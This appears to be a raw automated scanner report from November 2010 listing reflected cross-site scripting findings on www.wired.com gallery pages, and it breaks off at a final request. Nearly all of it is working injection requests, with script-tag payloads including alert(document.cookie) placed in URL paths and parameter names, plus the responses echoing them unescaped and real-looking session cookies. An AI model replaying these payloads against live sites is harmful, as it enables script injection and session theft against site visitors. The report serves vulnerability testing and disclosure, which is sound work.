The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5504f"><script>alert(1)</script>a63a753d0ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/art/multimedia/2008/05/gallery_faves_transportation_photos?5504f"><script>alert(1)</script>a63a753d0ce=1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:43 GMT Date: Sun, 21 Nov 2010 23:06:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41600
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/art/multimedia/2008/05/gallery_faves_transportation_photos?5504f"><script>alert(1)</script>a63a753d0ce=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aacf1"><a>9216975e40b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cultureaacf1"><a>9216975e40b/art/multimedia/2008/07/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29284 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 22:09:17 GMT Date: Sun, 21 Nov 2010 21:59:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cultureaacf1"><a>9216975e40b ss_art c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49165"><a>72a7f1e5436 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art49165"><a>72a7f1e5436/multimedia/2008/07/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29284 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 22:09:35 GMT Date: Sun, 21 Nov 2010 21:59:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art49165"><a>72a7f1e5436 c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bf9a"><a>2dcaf6e058c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/multimedia6bf9a"><a>2dcaf6e058c/2008/07/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29284 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 22:09:48 GMT Date: Sun, 21 Nov 2010 21:59:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_multimedia6bf9a"><a>2dcaf6e058c"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62137"><a>c291d377b9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture62137"><a>c291d377b9f/art/multimedia/2008/07/TKTKTK HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29290 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:55 GMT Date: Sun, 21 Nov 2010 23:06:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture62137"><a>c291d377b9f ss_art c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9075"><a>792f200a800 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/artb9075"><a>792f200a800/multimedia/2008/07/TKTKTK HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29290 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:18 GMT Date: Sun, 21 Nov 2010 23:07:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_artb9075"><a>792f200a800 c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c218"><a>6790c22ef86 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/multimedia4c218"><a>6790c22ef86/2008/07/TKTKTK HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29290 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:33 GMT Date: Sun, 21 Nov 2010 23:07:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_multimedia4c218"><a>6790c22ef86"> ...[SNIP]...
The value of the <img%20src request parameter is copied into the HTML document as plain text between tags. The payload 14661<script>alert(1)</script>f716d04df3f was submitted in the <img%20src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the <img%20src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ca4a"><script>alert(1)</script>649eec63546 was submitted in the <img%20src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74d3d"><a>9b77dfd8a23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture74d3d"><a>9b77dfd8a23/art/multimedia/2008/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29302 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 20:08:35 GMT Date: Sun, 21 Nov 2010 19:58:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture74d3d"><a>9b77dfd8a23 ss_art c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cc69"><a>3cda8068985 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art8cc69"><a>3cda8068985/multimedia/2008/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29302 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 20:08:49 GMT Date: Sun, 21 Nov 2010 19:58:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art8cc69"><a>3cda8068985 c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85426"><a>aac868d772e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/multimedia85426"><a>aac868d772e/2008/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29302 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 20:09:36 GMT Date: Sun, 21 Nov 2010 19:59:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_multimedia85426"><a>aac868d772e"> ...[SNIP]...
The value of the f56a1"><script>alert(1)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the HTML document as plain text between tags. The payload 966a2<script>alert(1)</script>976c2c8bf57 was submitted in the f56a1"><script>alert(1)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT</h1> request parameter is copied into the HTML document as plain text between tags. The payload 21969<script>alert(1)</script>01760d30d83 was submitted in the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT</h1> parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src request parameter is copied into the name of an HTML tag. The payload 6981a><script>alert(1)</script>03dc29fdb27 was submitted in the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src request parameter is copied into the HTML document as plain text between tags. The payload d1198<script>alert(1)</script>39b53ac696 was submitted in the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the f56a1"><script>alert(document.cookie)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the HTML document as plain text between tags. The payload ea80a<script>alert(1)</script>2ef91889cf7 was submitted in the f56a1"><script>alert(document.cookie)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbadd"><script>alert(1)</script>08561a98595 was submitted in the f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1cbadd"><script>alert(1)</script>08561a98595 HTTP/1.1 Host: www.wired.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: private, max-age=600 Expires: Sun, 21 Nov 2010 20:34:07 GMT Date: Sun, 21 Nov 2010 20:24:07 GMT Connection: close Content-Length: 40729
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1cbadd"><script>alert(1)</script>08561a98595', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of the f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88eac"><script>alert(1)</script>7170e64b2e2 was submitted in the f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=188eac"><script>alert(1)</script>7170e64b2e2 HTTP/1.1 Host: www.wired.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __unam=c1361f6-12c7006e158-7792a530-1; mobify=0; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; __utmb=238032518; __utmc=238032518; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_nr=1290369692237; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: private, max-age=600 Expires: Sun, 21 Nov 2010 20:35:32 GMT Date: Sun, 21 Nov 2010 20:25:32 GMT Connection: close Content-Length: 40743
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... cript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=188eac"><script>alert(1)</script>7170e64b2e2', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
1.73. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56a1"><script>alert(1)</script>4b74896c38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(1)</script>4b74896c38=1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=600 Expires: Sun, 21 Nov 2010 20:08:35 GMT Date: Sun, 21 Nov 2010 19:58:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 40625
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(1)</script>4b74896c38=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of the slideView request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cbdd"><script>alert(1)</script>6a2fa36c36 was submitted in the slideView parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/art/multimedia/2008/07/gallery_faves_food?slide=7&slideView=18cbdd"><script>alert(1)</script>6a2fa36c36 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:56 GMT Date: Sun, 21 Nov 2010 23:06:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 40168
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?slide=7&slideView=18cbdd"><script>alert(1)</script>6a2fa36c36', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb54d"><a>c56f61c551c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturebb54d"><a>c56f61c551c/art/multimedia/2008/07/gallery_top_10_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29303 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:56 GMT Date: Sun, 21 Nov 2010 23:06:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturebb54d"><a>c56f61c551c ss_art c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7c4c"><a>89e1688aab6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/artc7c4c"><a>89e1688aab6/multimedia/2008/07/gallery_top_10_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
